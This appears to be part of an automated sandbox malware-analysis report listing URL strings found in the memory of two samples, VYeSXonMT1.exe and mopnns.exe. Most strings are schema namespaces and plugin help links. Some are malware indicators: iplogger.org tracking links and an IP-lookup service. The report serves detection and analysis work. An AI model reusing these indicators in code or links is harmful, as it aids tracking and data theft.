Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: mopnns.exe, 00000004.00000002.469216086.00000000025F2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: mopnns.exe, 00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: mopnns.exe, 00000004.00000002.469190974.00000000025E2000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: mopnns.exe, 00000004.00000002.469278293.0000000002612000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: VYeSXonMT1.exe, VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmp	String found in binary or memory: https://autohotkey.com
Source: VYeSXonMT1.exe, 00000000.00000002.406063064.0000000003990000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405371643.0000000000400000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000003.374805242.0000000003A60000.00000004.00000001.sdmp	String found in binary or memory: https://autohotkey.comCould
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405960317.000000000209C000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/
Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1mhvg7
Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1mhvg7e
Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405979287.00000000020B5000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1mjvg7
Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/?Oq
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/S
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/a
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
